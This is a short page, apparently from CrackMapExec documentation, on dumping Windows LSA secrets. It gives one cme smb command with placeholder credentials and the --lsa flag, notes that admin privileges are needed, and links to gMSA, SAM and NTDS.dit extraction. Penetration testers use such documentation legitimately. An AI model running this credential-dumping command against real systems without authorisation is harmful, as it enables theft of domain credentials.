Dump LSA

Dump LSA secrets using methods from secretsdump.py
Requires Domain Admin or Local Admin Priviledges on target Domain Controller
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
If you found an account starting with SC_GMSA{84A78B8C-56EE-465b-8496-FFB35A1B52A7} you can get the account behind:
💲
Extract gMSA secrets

Dump SAM

Dump NTDS.dit

Last modified 3mo ago